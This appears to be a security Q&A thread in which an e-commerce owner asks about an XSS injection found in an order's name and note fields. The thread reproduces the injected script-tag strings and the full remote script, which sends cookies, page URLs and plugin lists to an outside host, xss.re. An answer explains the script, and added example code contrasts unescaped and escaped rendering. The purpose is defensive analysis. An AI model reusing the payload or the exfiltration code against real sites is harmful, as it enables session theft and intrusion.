3

An e-commerce site I run recently received a suspicious transaction. The field for the customer's name included a script tag, like so (customer's name changed to John Doe to protect anonymity):

John Doe"><script src=//xss.re/692></script>

The note field (where customers can write a note about their order) had the same tag without any other text:

"><script src=//xss.re/692></script>

The transaction appears otherwise normal. It's shipping to what appears to be a legitimate address in Ohio. The only other issue is that the somewhat legitimate-looking Gmail address, doejohn123@gmail.com, bounced. Since I can't contact the buyer and the general look is shady, I'm going to refund the payment, so no problem there.

What I'm curious about is, what is the purpose of the script tag? Googling "xss.re" doesn't seem to yield anything related, and the site itself just presents a login box for "IHONKER.ORG". The specific URL in the script ("xss.re/692") loads the following script:

// Comments added for readability; the script is otherwise reproduced as served, whitespace aside.
var x=new Image();
try
{
    var myopener='';
    myopener=window.opener && window.opener.location ? window.opener.location : '';
}
catch(err)
{
}
// Reports page URL, top-frame URL, cookies, opener, referrer and title to xss.re via an image request
x.src='http://xss.re/XSS/?do=api&act=r&id=692&diy[location]='+escape(document.location)+'&diy[toplocation]='+escape(top.document.location)+'&diy[cookie]='+escape(document.cookie)+'&diy[opener]='+escape(myopener)+'&diy[referrer]='+escape(document.referrer)+'&diy[title]='+escape(document.title);

// ActiveX ProgIDs probed in Internet Explorer, as "display name|ProgID|classID"
var activexa = new Array(
  "Flash Player 8|ShockwaveFlash.ShockwaveFlash.8|classID",
  "Flash Player 9|ShockwaveFlash.ShockwaveFlash.9|classID",
  "360Safe|360SafeLive.Update|classID",
  "Alibaba User(AliEdit)|Aliedit.EditCtrl|classID",
  "CMB Bank|CMBHtmlControl.Edit|classID",
  "Apple IPOD USER|IPodUpdaterExt.iPodUpdaterInterface|classID",
  "Apple iTunes|iTunesAdmin.iTunesAdmin|classID",
  "JRE 1.7|JavaWebStart.isInstalled.1.7.0.0|classID",
  "JRE 1.6(WebStart)|JavaWebStart.isInstalled.1.6.0.0|classID",
  "KMPlayer|KMPlayer.TKMPDropTarget|classID",
  "KingSoft Word(�ʰ�)|KSEngine.Word|classID",
  "Windows live Messanger|Messenger.MsgrObject|classID",
  "Nero|NeroFileDialog.NeroFileDlg|classID",
  "Nokia Cellphone|NokiaCL.PhoneControl|classID",
  "PPlayer|PPlayer.XPPlayer|classID",
  "Tencent QQ|Qqedit.PasswordEditCtrl|classID",
  "QuickTime|QuickTime.QTElementBehavior|classID",
  "Symantec Anti-Virus|Symantec.stInetTransferItem|classID",
  "Xunlei|XunLeiBHO.ThunderIEHelper|classID"
);

// IE path: tries to instantiate every ActiveX object above and reports the ones that succeed
function iescan(){
    var mytmp;
    var plus;   // never initialised, so the report begins with "undefined"
    var bar;
    var x=new Image();
    for (i=0; i<activexa.length; i++){
        mytmp = activexa[i].split('|');
        if ( checkobj(mytmp[1]) == true ){
            plus+="|"+mytmp[0]+"<br>";
        }
    }
    bar = escape(plus);
    // note document.myopener here (the first request used myopener); this one always sends "undefined"
    x.src='http://xss.re/XSS/?do=api&act=r&id=692&a=cplus&plus='+bar+'&diy[location]='+escape(document.location)+'&diy[toplocation]='+escape(top.document.location)+'&diy[cookie]='+escape(document.cookie)+'&diy[opener]='+escape(document.myopener)+'&diy[referrer]='+escape(document.referrer)+'&diy[title]='+escape(document.title);
}

// Returns true if the browser can create the given ActiveX object
function checkobj(objName){
    try {
        var Obj = new ActiveXObject(objName);
        return true;
    } catch (e){
        return false;
    }
}
//-------------
// Non-IE path: enumerates navigator.plugins (name and filename) and reports them
function check_plus() {
    var plus = "";
    var bar = "";
    var b=new Image();
    var num_of_plugins = navigator.plugins.length;
    for (var i=0; i < num_of_plugins; i++) {
        plus+= navigator.plugins[i].name+"&nbsp;|&nbsp;"+ navigator.plugins[i].filename +"<br>";
    }
    bar = escape(plus);
    b.src='http://xss.re/XSS/?do=api&act=r&id=692&a=cplus&plus='+bar+'&diy[location]='+escape(document.location)+'&diy[toplocation]='+escape(top.document.location)+'&diy[cookie]='+escape(document.cookie)+'&diy[opener]='+escape(myopener)+'&diy[referrer]='+escape(document.referrer)+'&diy[title]='+escape(document.title);
}

// !+[1,] is true only in old IE (trailing-comma array length quirk), so it selects the ActiveX scan there
function MyPlusCheck() {
    if(!+[1,]){
        iescan();
    }else{
        check_plus();
    }
}
// Delay the plugin scan by three seconds
setTimeout("MyPlusCheck()", 3000);

I'm having trouble understanding what the script does. So my questions are:

What does this script do?

As long as my site doesn't insert unfiltered user input into the DOM (it currently uses jQuery's .text(), which I believe is XSS safe), do I have anything to worry about from an attack like this?

Is there any plausible way that this tag could have been inserted by someone other than the person placing the order, i.e. malware on a legitimate customer's system?

Robert
  • 607
  • 5
  • 13

1 Answer

2

What does the script do?

It sends off some information to xss.re (by including it in a query string when loading images with JavaScript). If the attack had been successful, any person visiting the site where the injection took place would have had this information harvested:

  • The URL it was injected into (and some related things, like the "top" URL if it is in a frame, and the title).
  • Any cookies. This would include the session ID if it is not HTTP-only, and the CSRF token.
  • A list of ActiveX objects the browser can create.
  • A list of plugins the browser is using.

Not sure, but I guess the last two are to check if there are any vulnerable ones that can be used for further exploits.

If you navigate to xss.re you get a login screen. I suspect it is a service that helps you mount XSS attacks and gather data from it. In the request the script sends back, there is an id parameter included in the query string. It is set to 692, same number as in the URL. I guess that is the user ID of the attacker.

Did it work?

You should make sure you are not vulnerable to this kind of attack. To do that you need to check everywhere this kind of data is echoed into the page - frontend, backend, etc.

You are correct that .text() is safe, since it relies on .textContent. However, the way the data gets into the JS is also important. If you just do something like element.text(<% echo $name; %>); you might have a problem. But if you get the name from e.g. an HTTP API call you are fine.

Anders
  • 64,406
  • 24
  • 178
  • 215
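To make the answer's last point concrete, here is an added example (not code from the question, the answer, or the store's own code) that renders the two payloads from the order in an HTML attribute context and in an inline-script context, each with and without escaping. The `$("#customer")` selector, the `<input>` markup and the `<script>` wrapper are assumed page fragments; the payload strings are the ones quoted in the question.

```javascript
// The two values the asker found in the name and note fields.
const NAME_PAYLOAD = 'John Doe"><script src=//xss.re/692></script>';
const NOTE_PAYLOAD = '"><script src=//xss.re/692></script>';

// Escape for an HTML text or attribute-value context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the stored name is concatenated straight into an attribute value.
// The leading `">` in the payload closes the attribute and the tag, so the
// <script> that follows becomes a real element.
function renderUnsafe(name) {
  return '<input name="customer" value="' + name + '">';
}
// Hardened: the same fragment with the value entity-encoded.
function renderSafe(name) {
  return '<input name="customer" value="' + escapeHtml(name) + '">';
}

// Vulnerable: the server echoes the raw value into an inline script, the
// `element.text(<% echo $name; %>)` pattern the answer warns about. Here the
// browser's HTML parser sees `</script>` inside the string and ends the block.
function scriptUnsafe(name) {
  return '<script>$("#customer").text("' + name + '");</script>';
}
// Hardened: JSON-encode the value and replace the characters that could end
// the script element or the string literal early.
function toJsLiteral(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}
function scriptSafe(name) {
  return '<script>$("#customer").text(' + toJsLiteral(name) + ');</script>';
}

// Rough proxy for what the HTML parser will see: number of script start tags.
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}
```

Counting `<script` start tags is a shortcut for the purpose of the example; the point is that the safe variants leave the payload inert in both contexts while the client-side `.text()` call still receives the exact original string.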